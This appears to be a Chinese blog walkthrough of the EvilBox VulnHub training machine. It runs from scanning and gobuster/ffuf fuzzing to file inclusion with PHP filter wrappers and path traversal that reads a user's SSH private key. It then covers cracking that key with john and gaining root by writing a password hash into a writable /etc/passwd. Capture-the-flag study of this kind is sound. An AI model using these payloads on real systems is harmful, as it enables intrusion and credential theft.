EvilBox靶机之强制访问、文件包含、PHP封装器、gobuster路径爆破、ffuf参数爆破、SSH公钥登录、系统权限漏洞利用

于 2023-05-12 14:14:28 发布
阅读量245 收藏 1
点赞数
分类专栏: 渗透测试 打靶 文章标签: web安全 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40898302/article/details/130641054
版权

靶机地址:https://download.vulnhub.com/evilbox/EvilBoxhttps://download.vulnhub.com/evilbox/

难度等级:低→中

打靶目标:取得 root 权限 + 2 Flag

涉及攻击方法:

主机发现

网络扫描

强制访问

参数爆破

文件包含

PHP封装器

任意文件读取

SSH公钥登录

离线密码破解

系统权限漏洞利用

一、主机发现

fping -gaq 172.20.10.0/24

二、端口扫描

nmap -p22,80 -A 172.20.10.4

-A == -sV -sC -o

三、路径爆破-gobuster

gobuster dir -u http://172.20.10.4/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html.jsp

gobuster dir -u http://172.20.10.4/secret -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html.jsp

四、参数爆破

ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:PARAM -w val.txt:VAL -u http://172.20.10.4/secret/evil.php?PARAM=VAL -fs 0

-fs 0 过滤掉空内容

利用文件包含爆破参数

ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:PARAM -u http://172.20.10.4/secret/evil.php?PARAM=../index.html -fs 0

五、PHP封装器

利用PHP封装器读取源码

http://172.20.10.4/secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php

PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKCRmaWxlbmFtZSk7Cj8+Cg== <?php $filename = $_GET['command']; include($filename); ?>

利用PHP封装器写入(需要写入权限)

http://172.20.10.4/secret/evil.php?command=php://filter/write=convert.base64-docode/resource=test.php&txt=MTIz

MTIz为 123 bash64加密

六、SSH公钥登录

查看SSH支持那种登录方式

ssh mowree@172.20.10.4 -v

查看用户公钥

http://172.20.10.4/secret/evil.php?command=../../../../../../../../../home/mowree/.ssh/authorized_keys

查看私钥

view-source:http://172.20.10.4/secret/evil.php?command=../../../../../../../../../home/mowree/.ssh/id_rsa

在kali主目录生成id_rsa文件,将私钥复制进id_rsa

给id_rsa设置相应权限

chmod 600 id_rsa

利用私钥登录

ssh mowree@172.20.10.4 -i id_rsa

选取大字典rockyou.txt 对私钥进行爆破

使用john对私钥进行爆破

1、将id_rsa转换为john可以识别的格式

2、使用john进行爆破

john hash --wordlist=rockyou.txt

七、系统权限漏洞利用

突破边界进行提权

利用可写权限文件

find / -writable 2>/dev/null | grep -v pro

发现/etc/passwd可写

给root用户生成密码

openssl passwd -1

密码:123

将生成的密码放在/etc/passwd

提权成功

白冷
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
upload 靶机上传漏洞利用教学(含代码分析).doc
09-16
php 上传漏洞大演练。推荐使用Windows系统搭建,我最先使用docker pull c0ny1/upload-labs的镜像在Pass-03遇到问题,初步判断是该镜像内的php.conf文件配置错误导致。
利用 通达OA 文件上传漏洞上传webshell获取主机权限
最新发布
04-30
帮客户搭建一个演示环境,用于给领导演示,这里我利用了通达OA11.6文件上传漏洞往靶机上上传了一个webshell,然后通过蚁剑去连接webshell从而获取主机权限。 环境要求: 1.靶机环境win10 2.通达OA版本11.6 3.攻击机...
vulnhub靶机--EvilBox
weixin_46107179的博客
04-13 291
靶机下载地址:靶机下载地址 主机发现 信息搜集 通过nmap扫描,得知开放22,80端口,版本信息以及相关的服务信息 浏览访问该地址,发现只是一个Apache2默认的页面,然后利用gobuster进行目录和文件扫描,通过-x指定文件类型,得到一个secret的目录和index.html以及robots.txt 访问index.html是刚刚那个Apache2的默认页面,然后访问robots.txt,是一个像似用户名,用hydra爆破ssh并未成功;最后访问secret目录,发现是一个空白页,通过源码
evil-box靶场记录
胖虎的博客
11-16 1085
evilbox渗透测试记录
Evilbox-One靶机打靶过程与思路
qq_52610024的博客
04-21 2524
没有有效信息,思考是否可能有写入权限php//filter/write=convert.base64-decode/resource=test.php&txt=MTIz。-wval.txtVAL-uhttp//10.0.2.26/secret/evil.php?/home/mowree/.ssh/id_rsa。查找suid文件权限find/-perm/40002>/dev/null4000是suid权限位置,后面是将报错文件放置到空白目录中。/etc/passswd。...
EvilBox-one靶机实验实战演练
lianliandad的博客
11-01 843
好好学习
kali渗透综合靶机(十六)--evilscience靶机
W小哥
04-02 1015
https://download.vulnhub.com/theether/theEther_1.0.1.zip
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu)
02-18
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu),真实有效,如有侵权,请联系csdn删除即可
66.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。第1页 共25页
Ffuf爆破(超详细)
LainWith的博客
12-26 8682
基于Go语言开发,速度极快,并且跨平台可以颜色高亮输出强大的过滤系统和代理系统能适应多种情景下的模糊测试广受好评,持续更新不能够完整打印出爆破出来的URI路径。user-agent特征明显,不能随机user-agent。
Ffuf使用教程
热门推荐
weujie
09-25 1万+
/'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ 该工具用途广泛,可用于多种用途。一些用途: • 目录发现,可选择在 URL 中的.
防止暴力破解ssh的四种方法
不吃羊的小灰灰博客
03-05 7464
防止暴力破解的四种方法
最详细php文件包含全内容(上),版权保护,严禁转载
qq_62708558的博客
06-01 2584
php最详细文件包含漏洞解析(上),禁止转载
Vulnhub靶机EVILBOX_ ONE(很详细)
LainWith的博客
07-08 2878
系列:EvilBox(此系列共1台) 发布日期:2021年08月16日 **难度等级:**低→中 **打靶目标:**取得 root 权限 + 2 Flag 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ 涉及攻击方法:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。 打开就是一个ubuntu站点,看不出什么东西,下一步自然是目录扫描了。 常规的dirsearch扫描完毕后,发现
ffuf安装与使用教程
weixin_50464560的博客
12-02 2886
ffuf的安装 go环境安装 需要在kali linux下安装go环境 下载安装包 wget -c https://golang.google.cn/dl/go1.16.2.linux-amd64.tar.gzwget -c https://golang.google.cn/dl/go1.16.2.linux-amd64.tar.gzwget -c https://golang.google.cn/dl/go1.16.2.linux-amd64.tar.gz 进行解压缩 tar -...
ffuf:Go语言编写的高速Web Fuzzer
systemino的博客
05-25 1667
ffuf是一款Go语言编写的高速Web Fuzzer工具,该项目深受大型项目gobuster和wfuzz的启发。 特性 一个字,快! 允许fuzz HTTP header值,POST数据和URL的不同部分,包括GET数名称和值; 支持静默模式(-s); 模块化架构; 易于添加的过滤和匹配。 安装 从releases页面下载预构建的二进制文件,解压缩并运行。 如果你已经安装了编...
Vulnhub靶机_EVILBOX: ONE
学术渣渣的博客
10-25 519
文章目录靶机信息渗透过程获取靶机IP端口扫描网站目录扫描 靶机信息 下载地址:http://www.vulnhub.com/entry/evilbox-one,736/ 难易程度:简单 渗透过程 获取靶机IP 这个靶机启动后会显示IP地址:192.168.1.103 用主机扫描也可以扫到: arp-scan -l 端口扫描 这里开放了两个端口:22,80。 nmap -A -T4 -p 1-65535 192.168.1.103 网站目录扫描 首先扫描一下特殊文件,这里扫描到一个robots.tx
1.服务器中的漏洞可能是常规漏洞也可能是系统漏洞;\n2.靶机服务器上的网站可
09-17
系统漏洞则是指操作系统本身存在的漏洞,黑客利用这些漏洞可以实施更为复杂的攻击。常规漏洞和系统漏洞都需要及时发现和修复,以防止黑客利用这些漏洞入侵服务器并进行恶意攻击。 2. 靶机服务器上的网站。 靶机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值